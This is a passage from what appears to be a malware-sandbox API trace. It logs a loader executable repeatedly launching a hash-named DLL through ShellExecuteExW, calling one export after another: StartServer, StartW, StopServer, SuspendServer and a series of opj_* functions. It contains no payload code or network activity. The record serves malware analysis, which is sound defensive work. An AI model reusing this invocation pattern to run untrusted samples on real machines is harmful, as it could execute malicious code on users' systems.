dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0086.288] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0086.289] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0086.289] GetLastError () returned 0x0 [0086.289] SetLastError (dwErrCode=0x0) [0086.289] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartServer", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartServer", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0091.437] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0091.438] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0091.438] GetLastError () returned 0x0 [0091.438] SetLastError (dwErrCode=0x0) [0091.439] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartW", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartW", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0095.087] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0095.088] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0095.088] GetLastError () returned 0x0 [0095.088] SetLastError (dwErrCode=0x0) [0095.088] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StopServer", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StopServer", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0101.280] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0101.281] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0101.281] GetLastError () returned 0x0 [0101.281] SetLastError (dwErrCode=0x0) [0101.281] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=SuspendServer", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=SuspendServer", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0105.448] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0105.449] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0105.449] GetLastError () returned 0x0 [0105.449] SetLastError (dwErrCode=0x0) [0105.449] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_codec_set_threads", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_codec_set_threads", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0109.995] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0109.996] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0109.996] GetLastError () returned 0x0 [0109.996] SetLastError (dwErrCode=0x0) [0109.996] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_compress", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_compress", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0116.253] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0116.255] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0116.255] GetLastError () returned 0x0 [0116.255] SetLastError (dwErrCode=0x0) [0116.256] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_decompress", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_decompress", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0124.862] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0124.863] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0124.863] GetLastError () returned 0x0 [0124.863] SetLastError (dwErrCode=0x0) [0124.864] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0136.697] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0136.699] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0136.699] GetLastError () returned 0x0 [0136.699] SetLastError (dwErrCode=0x0) [0136.699] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode_tile_data", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_decode_tile_data", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0148.012] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0148.013] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0148.013] GetLastError () returned 0x0 [0148.013] SetLastError (dwErrCode=0x0) [0148.014] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_codec", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_codec", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0155.183] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0155.184] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0155.184] GetLastError () returned 0x0 [0155.184] SetLastError (dwErrCode=0x0) [0155.184] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_index", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_index", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0165.308] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0165.309] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0165.310] GetLastError () returned 0x0 [0165.310] SetLastError (dwErrCode=0x0) [0165.310] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_info", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_destroy_cstr_info", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0174.540] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0174.541] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0174.541] GetLastError () returned 0x0 [0174.541] SetLastError (dwErrCode=0x0) [0174.541] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_dump_codec", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_dump_codec", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0181.460] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0181.462] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0181.462] GetLastError () returned 0x0 [0181.462] SetLastError (dwErrCode=0x0) [0181.462] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encode", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encode", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0186.948] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0186.949] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0186.949] GetLastError () returned 0x0 [0186.949] SetLastError (dwErrCode=0x0) [0186.949] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encoder_set_extra_options", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_encoder_set_extra_options", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0191.519] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0191.520] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0191.520] GetLastError () returned 0x0 [0191.520] SetLastError (dwErrCode=0x0) [0191.520] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_compress", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_compress", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0200.080] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0200.081] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0200.082] GetLastError () returned 0x0 [0200.082] SetLastError (dwErrCode=0x0) [0200.082] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_decompress", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_end_decompress", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0213.403] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0213.404] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0213.404] GetLastError () returned 0x0 [0213.404] SetLastError (dwErrCode=0x0) [0213.404] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_index", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_index", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0226.769] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0226.769] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0226.770] GetLastError () returned 0x0 [0226.770] SetLastError (dwErrCode=0x0) [0226.770] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_info", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_get_cstr_info", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0238.238] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0238.239] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0238.239] GetLastError () returned 0x0 [0238.239] SetLastError (dwErrCode=0x0) [0238.240] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", 